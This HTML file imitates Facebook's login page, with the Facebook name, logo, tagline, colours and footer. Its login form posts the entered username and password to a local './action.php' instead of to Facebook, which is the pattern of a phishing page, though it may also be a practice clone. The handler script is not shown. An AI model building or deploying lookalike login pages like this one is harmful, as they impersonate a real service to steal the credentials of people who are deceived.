<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook</title>
    <style>
        html {
            background-color: white;
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
        }

        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        .container {
            display: flex;
            width: 100%;
            height: 85vh;
            padding-top: 92px;
            padding-bottom: 132px;
            background-color: rgb(240, 242, 245);
            justify-content: space-around;
            flex-wrap: wrap;
        }
        img{
            width: 301px;
            height: 106px;
        }
        .title {
           margin-top: 100px;
           width: 580px;
           font-size: 28px;
        }

        .login {
            width: 396px;
            height: 456px;
            text-align: center;
            
        }
        .loginForm{
            background-color: white;
            border-radius: 7px;
            margin-top: 20px;
            box-shadow: 5px 5px 5px 3px rgb(236, 235, 235);
        }
        form{
            width: 396px;
            display: flex;
            flex-direction: column;
            align-items: center;
        }
        .logIn{
            width: 363px;
            height: 48px;
            color: white;
            font-size: 20px;
            background-color: #1877f2;
            border: none;
            border-radius: 6px;
        }
        .newAccount{
            height: 48px;
            width: 270px;
            font-size: 20px;
            color: white;
            background-color: #42b72a;
            border: none;
            border-radius: 6px;
            margin-bottom: 20px;
        }
        input{
            width: 364px;
            height: 52px;
            font-size: 17px;
            padding: 16px 5px;
            margin: 10px;
            border: 1px solid gainsboro;
            border-radius: 5px;
        }
        .footer {
            display: flex;
            flex-direction: column;
            list-style: none;
            padding-top: 20px;
            margin: 0 40px;
            font-size: 12px;
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
        }

        a:link {
            text-decoration: none;
            padding-left: 10px;
            color: rgb(138, 141, 145)
        }

        a:hover {
            text-decoration: underline;
            color: rgb(138, 141, 145)
        }

        .box1 {
            display: flex;
            justify-content: flex-start;
        }

        .box2 {
            display: flex;
            line-height: 20px;
        }

        .box3 {
            padding: 20px 0;
            color: rgb(138, 141, 145)
        }
        @media (max-width: 975px){
            .title{
                width: 396px;
                font-size: 20px;
            }
        }
        @media (max-width: 791px){
            .container{
                padding: 10px;
            }
            .title{
                text-align: center;
                margin-top: 0px;
                font-size: 25px;
            }
            .logIn{
                margin-top: 0px;
            }
        }
    </style>
</head>

<body>
    <div class="container">
        <div class="title">
            <img src="./pic/download.png" alt="Facebook">
            <p>Facebook helps you connect and share with the people in your life.</p>
        </div>
        <div class="login">
            <div class="loginForm">
                <form action="./action.php">
                    <input type="text" id="username" name="username" placeholder="Email ddress and phone number" style="margin-top: 30px;">
                    <input type="text" id="password" name="password" placeholder="Password">
                    <button type="submit" class="logIn">Log In</button>
                    <a href="#" style="font-size: 14px; margin-top: 16px;">Forgotten password?</a>
                    <br>
                    <hr style="width: 300px;">
                    <br>
                    <button type="menu" class="newAccount">Create New Account</button>
                </form>
            </div>
            <p style="padding-top: 20px;"> <a href="#" style="color: black;"><strong>Create a Page</strong></a> for a celebrity, brand or business.</p>
        </div>
    </div>
    <div class="footer">
        <div class="box1">
            <li>
                <a href="#" style="padding: 0px;">English (UK)</a>
                <a href="#1">ภาษาไทย</a>
                <a href="#">日本語</a>
                <a href="#">中文(简体)</a>
                <a href="#">Tiếng Việt</a>
                <a href="#">Français (France)</a>
                <a href="#">Deutsch</a>
                <a href="#">Русский</a>
                <a href="#">Español</a>
                <a href="#">Português (Brasil)</a>
                <a href="#">Italiano</a>
            </li>
        </div>
        <br>
        <hr style="border-color: rgb(248, 248, 246);">
        <br>
        <div class="box2">
            <li>
                <a href="#" style="padding:0px;">Sign Up</a>
                <a href="#">Log In</a>
                <a href="#">Messenger</a>
                <a href="#">Facebook Lite</a>
                <a href="#">Watch</a>
                <a href="#">Places</a>
                <a href="#">Games</a>
                <a href="#">Marketplace</a>
                <a href="#">Facebook Pay</a>
                <a href="#">Oculus</a>
                <a href="#">Portal</a>
                <a href="#">Instagram</a>
                <a href="#">Bulletin</a>
                <a href="#">Local</a>
                <a href="#">Fundraisers</a>
                <a href="#">Services</a>
                <a href="#">Voting Information </a>
                <a href="#">Centre</a>
                <a href="#">Groups</a>
                <a href="#">About</a>
                <a href="#">Create ad</a>
                <a href="#">Create Page</a>
                <a href="#">Developers</a>
                <a href="#">Careers</a>
                <a href="#">Privacy</a>
                <a href="#">Cookies</a>
                <a href="#">Ad</a>
                <a href="#">Choices</a>
                <a href="#">Terms</a>
                <a href="#">Help</a>
                <a href="#">Setting</a>
            </li>
        </div>
        <div class="box3">Meta © 2022</div>
    </div>
</body>

</html>